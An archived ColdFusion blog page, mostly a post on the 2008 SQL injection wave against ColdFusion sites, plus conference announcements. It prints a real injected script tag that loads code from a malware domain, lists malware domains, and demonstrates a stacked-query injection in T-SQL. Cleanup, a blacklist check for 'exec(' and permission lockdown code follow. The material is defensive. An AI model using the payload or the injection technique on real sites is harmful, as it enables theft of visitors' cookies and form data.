Entries Tagged as 'ColdFusion'

CFDevCon cancelled, have an AWeeDram of scotch instead

ColdFusion 2 Comments »

As you have probably noticed by now, CFDevCon unfortunately got cancelled. This was mainly due to lack of sponsorship which meant we could not afford to run the event, and there were really no cutbacks we could make to get around this as the main cost was the venue.

As one door closes, another opens, with AWeeDram conveniently popping up and advertising itself as a "replacement for CFDevCon" and costing only £10 entry, so there is no excuse not to come.


In the style of the original CFDevCon, they have just a single track with a great lineup of 7 terrific speakers, presenting on topics that many want to know or know more about: ColdSpring, OO, clustering, Subversion, dev practices, and Railo. The topics are being presented consecutively, so you won't need to worry about missing a single one. That also makes for an easy read of the web site: it's just a single page, with popups for each talk. Take just a minute to check it out.

Put on by the same folks who run Scotch on the Rocks, I'm sure A Wee Dram will be as fun (and relaxed) as it will be informative. 

 

While I am always happy to see another CF related event, I wasn't really too happy at the way they went about organising it and announcing it as a replacement for CFDevCon without even telling us. Had they taken a few moments to communicate their plans to me, I would have been more than happy to support it and put a notice on the CFDevCon site officially endorsing AWeeDram as a replacement for CFDevCon. 


SQL Injection Attacks and How to protect yourself

ColdFusion , SQL Server 37 Comments »

This week there has been an increase in SQL injection attacks, specifically against ColdFusion sites, since the hackers have discovered they are also vulnerable, primarily because most developers are not using <cfqueryparam>. You should also be aware that, prior to the actual attacks, bots first run vulnerability tests against sites to find out which language and which database they are using, to determine which vulnerability they may be susceptible to.

 

Use of cfqueryparam is pretty much a must-have for your queries these days. It is effective because the query is sent as a prepared statement: the SQL text and the parameter values travel separately, so each value is bound as data of the declared cfsqltype (an integer, a string, a date) and can never be parsed as part of the statement, which is what stops SQL injection. The one thing it cannot do is parameterize identifiers, so a table or column name or an ORDER BY clause taken from user input still has to be checked against a list of allowed values. Many ColdFusion developers do not seem to use cfqueryparam, probably because they do not know it exists. In fact cfqueryparam has existed since CF 4.5 (I have to admit even I didn't know that); it has only really been promoted as a best practice and a way to avoid SQL injection since CF 6.
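To make the mechanism concrete, here is an added example (not from the original post) in T-SQL that you can paste into Management Studio. It creates a constructed temporary table and a constructed payload in the style of the verynx.cn attack, then runs it twice: once with the value concatenated into the SQL text, which is exactly what `WHERE id = #url.id#` inside a <cfquery> produces, and once with the value passed as a typed parameter through sp_executesql, the server-side shape of a prepared statement such as the one a cfqueryparam-bound query is sent as. Table, column and payload are assumptions; it needs SQL Server 2005 or later for TRY/CATCH.

```sql
-- Added example, not from the original post: constructed table and payload.
SET NOCOUNT ON;
CREATE TABLE #products (id int, name varchar(200));
INSERT INTO #products (id, name) VALUES (1, 'Widget');
INSERT INTO #products (id, name) VALUES (2, 'Gadget');

-- What an attacker sends as ?id=... : a valid id followed by a second statement.
-- The UPDATE has no WHERE clause, just like the real attack, so every row is hit.
DECLARE @input nvarchar(400);
SET @input = N'1; UPDATE #products SET name = name + ''</title><script src="http://1.verynx.cn/w.js"></script>''';

-- (1) Concatenation: the whole string is parsed as SQL, so BOTH statements run.
--     This is what <cfquery> does when #url.id# is pasted into the SQL text.
DECLARE @sql nvarchar(max);
SET @sql = N'SELECT id, name FROM #products WHERE id = ' + @input;
EXEC (@sql);
SELECT name AS after_concat FROM #products WHERE id = 1;
-- Widget</title><script src="http://1.verynx.cn/w.js"></script>

-- Put the row back for the second run.
UPDATE #products SET name = 'Widget' WHERE id = 1;

-- (2) Parameter binding: the same text is a VALUE of type int, never SQL.
--     A non-numeric payload fails the type conversion and nothing executes,
--     which is what cfsqltype="cf_sql_integer" gives you.
BEGIN TRY
    EXEC sp_executesql N'SELECT id, name FROM #products WHERE id = @id',
                       N'@id int', @id = @input;
END TRY
BEGIN CATCH
    SELECT ERROR_MESSAGE() AS rejected_parameter;  -- Conversion failed ... to data type int
END CATCH;

-- A string parameter behaves the same way: the payload is compared as a literal,
-- matches nothing, and the embedded UPDATE is never executed.
EXEC sp_executesql N'SELECT id, name FROM #products WHERE name = @n',
                   N'@n varchar(200)', @n = @input;
SELECT name AS after_param FROM #products WHERE id = 1;  -- still Widget

DROP TABLE #products;
```

The first SELECT after the concatenated run is the state the cleanup script later in this post is written to repair; the second shows that with a bound parameter there is nothing to repair, because the payload never left the data channel.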

 

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

 

Like standard SQL injection, ColdFusion attacks have been around for years. What appears to have happened now is the same thing that led to the millions of compromises in the ASP/SQL Server attacks: the use of automated tools.

 

Following are some of the malware domains involved in the recent ColdFusion attacks:

  • mh.976801.cn
  • 1.verynx.cn
  • mm.ll80.com

 

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

 

</title><script src="http://1.verynx.cn/w.js"></script>

 

The resulting JavaScript, which gets loaded into your pages, is used to "phish" your visitors' details by copying their cookies and other personal details from form fields. There are various incarnations of this attack now, resulting in different scripts being inserted into your database. If restoring a database backup is not an option for you, then the following little script may help you out.


DECLARE @T varchar(255), @C varchar(4000)
-- every column of every user table whose type is ntext (99), text (35), nvarchar (231) or varchar (167)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id = b.id and a.xtype = 'u' and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  -- replace() does not accept text/ntext columns directly, so cast first (nvarchar(max) needs SQL Server 2005 or later;
  -- on SQL Server 2000 use varchar(8000) instead). The result is converted back to the column's type on assignment.
  exec('update [' + @T + '] set [' + @C + '] = replace(cast([' + @C + '] as nvarchar(max)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor


This script will undo the changes made by the attack by searching for the aforementioned string in every character column of every table in your database and removing it. All you need to do is change the string so that it exactly matches what was inserted into your database: the different incarnations of the attack use slightly different strings (the one in the script starts with "> and ends with <!--, whereas the one quoted earlier does not), so copy it from an affected row rather than retyping it. If your site was attacked multiple times, check whether the same string was inserted each time; replace() removes every occurrence of one string in a single pass, but each different variant needs its own run of the script with its own string.

 

Protecting Yourself 

 

All of the attacks we have seen so far are carried out with the "Exec()" command, so they only affect Microsoft SQL Server databases. A quick and easy stopgap is therefore to add a URL and FORM scope validation script to your Application.cfm or Application.cfc that makes sure none of these variables contains the Exec() command.

 

E.G.

 

<!--- "contains" is case-insensitive in CFML, so EXEC( and Exec( are caught as well --->
<cfloop collection="#form#" item="item">
 <cfif form[item] contains "exec(">
    <!--- your decision code here, e.g. log the request and <cfabort> --->
 </cfif>
</cfloop>
<cfloop collection="#url#" item="item">
 <cfif url[item] contains "exec(">
    <!--- your decision code here, e.g. log the request and <cfabort> --->
 </cfif>
</cfloop>

 

You could of course expand this further to check for other SQL keywords in the FORM or URL scope, as there should never be any SQL in these scopes if your code is well written. Your decision code determines what happens when a match is found; as it is obviously an attack there is no point in continuing to process the request or trying to strip the unwanted strings out, so just abort it or generate an error page. Bear in mind that this is a blacklist: a payload written as "exec (" with a space, or using "execute", slips straight past the check above, so treat it as a tripwire that buys you time while you fix the queries, not as the fix itself.

You should of course also be adding cfqueryparam tags to all your queries; if for some reason you cannot, then you should be validating the data types another way, for example with <cfparam type="numeric"> or val() for numeric values.

The best approach you can take is to lock down your database users with specific permissions, so that the login behind your web site's DSN can only SELECT from the database and cannot UPDATE, DELETE or EXECUTE. Ideally those permissions belong only to a separate login used by your back-end admin system. If parts of the public site genuinely need to write to the database, restrict that user or DSN to the specific tables and columns it needs. With this in place an injected UPDATE fails with a permissions error even if it gets past your code and reaches the server.
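Here is what that lockdown looks like as an added example in T-SQL, not from the original post: one login for the public pages and one for the admin area, with the public one granted SELECT, a single table INSERT and a single column UPDATE, and nothing else. Database name, table names, column names and passwords are assumptions (the tables dbo.products, with a hit_count column, and dbo.comments are assumed to exist); CREATE LOGIN, schema-level grants and EXECUTE AS need SQL Server 2005 or later.

```sql
-- Added example, not from the original post: one database user per role.
USE MySiteDb;   -- assumed database name

-- Public web pages: read everything, write almost nothing.
CREATE LOGIN site_public WITH PASSWORD = 'ReplaceWithAStrongPassword!1';  -- assumption
CREATE USER  site_public FOR LOGIN site_public;
GRANT SELECT ON SCHEMA::dbo TO site_public;
GRANT INSERT ON dbo.comments TO site_public;             -- the one table the public can add to
GRANT UPDATE (hit_count) ON dbo.products TO site_public; -- one column, not the whole row
-- Explicit DENY wins over any role the user might later be added to (e.g. db_datawriter).
DENY DELETE, EXECUTE ON SCHEMA::dbo TO site_public;

-- Back-end admin area: full DML, still no EXECUTE and no DDL (not db_owner).
CREATE LOGIN site_admin WITH PASSWORD = 'ReplaceWithAnotherStrongPassword!2';  -- assumption
CREATE USER  site_admin FOR LOGIN site_admin;
GRANT SELECT, INSERT, UPDATE, DELETE ON SCHEMA::dbo TO site_admin;

-- Check: impersonate the public user and try what the injected payload tries.
EXECUTE AS USER = 'site_public';
BEGIN TRY
    UPDATE dbo.products SET name = name + '<script src="http://1.verynx.cn/w.js"></script>';
END TRY
BEGIN CATCH
    SELECT ERROR_MESSAGE() AS refused;  -- The UPDATE permission was denied on ... 'products'
END CATCH;
REVERT;
```

Point the public site's DSN in the ColdFusion Administrator at site_public and the admin area's DSN at site_admin. An injected EXEC(...) still runs under the public login, so every UPDATE or DELETE inside it is refused by the server regardless of how it got there.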

 

If you need to find out which pages on your site have been attacked, check your web server logs and search for strings such as "exec" or "declare" or other SQL keywords. Bear in mind that the payload arrives URL-encoded in the query string, so in the raw log the spaces and brackets around those keywords appear as %20 and %28, and a case-insensitive search is needed as the bots do not care about case.


CFDevCon 2008 is here

ColdFusion No Comments »

I know many of you have been eagerly awaiting the next CFDevCon ColdFusion conference, well you will be happy to hear the new 2008 web site is now live as of yesterday and registrations are now open.

 

The survey results in 2006 were quite clear: most delegates wanted a better venue, a better conference hotel, better food, more tracks, more days and more bells and whistles, and were happy to pay more for the tickets. As this is a community-driven event, by developers for developers, that is what we have done, and we think we have still managed to keep the price quite reasonable too.

 

This year is a 2 day event with multiple tracks and an array of well known speakers presenting on popular topics. We have also opted for the seaside town of Brighton as the location this year, which is only 45 minutes direct from London Victoria on the train, so not only do you get to attend a great conference, but you can also then have a nice weekend break by the sea if you so wish. Much better than being stuck in rip-off London we think, with its outlandish prices, crowded/smelly streets and tube stations, unreliable public transport, and having to rush to catch the last tube back to your hotel every night.

 

So what are you waiting for, mosey on over to www.cfdevcon.com and register already.

Webmaniacs 2008 conference

ColdFusion No Comments »

2008 WebManiacs Conference

Hurry, seats are filling up fast! Register Now

During this two day CF/AIR conference and three day FLEX/AIR conference you will learn all of the tips and tricks that industry veterans use to produce award winning web sites and web applications using ColdFusion, AIR, and FLEX.

 

Conference Highlights:

 

  • Four concurrent HANDS-ON sessions where you will practice implementing best-practices techniques with your Adobe certified instructor in one of our recently remodeled computer labs!
  • Four concurrent lecture-discussion sessions from industry veterans
  • Sessions targeted specifically for Government IT, non-profits, and commercial sectors
  • Sessions for beginning, intermediate, and advanced developers
  • Over fifty (50) speakers!
  • TWO HUNDRED sessions in total covering nearly 140 separate and distinct topics!


  • May 19th: Ben Forta, Adobe
  • May 21st: Ryan Stewart, Adobe
  • May 22nd: Ashley Streb, Brightcove
  • May 23rd: Andrew Kirkpatrick, Adobe


Be a Sponsor:

 

Get great visibility in front of a captive audience of web developers. Learn more.

 

The Future of Web Applications: Adobe ColdFusion, Flex, and AIR

ColdFusion No Comments »

 

Since well before coining the term Rich Internet Application (RIA) in 2002, Adobe has been deeply focused on improving the web experience and delivering the underlying technologies to produce more interactive and expressive web applications.

 

Join Adobe and Carahsoft for a webcast showcasing how ColdFusion 8's built-in integration enables the development of Flex and AIR applications to meet users' demanding requirements more efficiently.

RIAs offer organizations a proven, cost-effective way to deliver modern applications with real business benefits, which include:

 

  • A richer, more engaging experience for users
  • Keeping pace with users' rising expectations
  • An increase in customer loyalty and higher profit generation
  • The ability to reach 98% of Internet-enabled desktops
  • Leverage of existing personnel, processes, and infrastructure
Powered by Mango Blog. Design and Icons by N.Design Studio